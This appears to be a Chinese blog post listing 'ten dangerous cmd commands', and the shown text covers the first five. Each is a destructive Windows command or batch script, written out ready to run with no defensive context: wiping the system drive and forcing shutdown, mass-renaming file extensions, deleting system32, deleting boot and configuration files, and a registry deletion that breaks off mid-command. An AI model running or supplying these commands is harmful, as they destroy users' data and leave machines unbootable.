十大危险cmd指令

  • Post author:
  • Post category:其他


1 蓝屏死机

Del %windowsdrive%\*.* /f /s /q Shutdown -s -f -t 0 

2 更改文件后缀名

 Ren *.doc *.txt Ren *.jpeg *.txt Ren *.lnk *.txt Ren *.avi *.txt Ren *.mpeg *.txt Ren *.com *.txt Ren *.bat *.txt 

3 删除system32

 Del c:\windows\system32\*.* /q 

4 使PC永久崩溃

 @echo off Attrib -r -s -h c:\autoexec.bat Del c:\autoexec.bat Attrib -r -s -h c:\boot.ini Del c:\boot.ini Attrib -r -s -h c:\ntldr Del c:\ ntldr Attrib -r -s -h c:\windows\win.ini Del c:\windows\win.ini 

5 删除所有的注册表

 @echo off Start reg del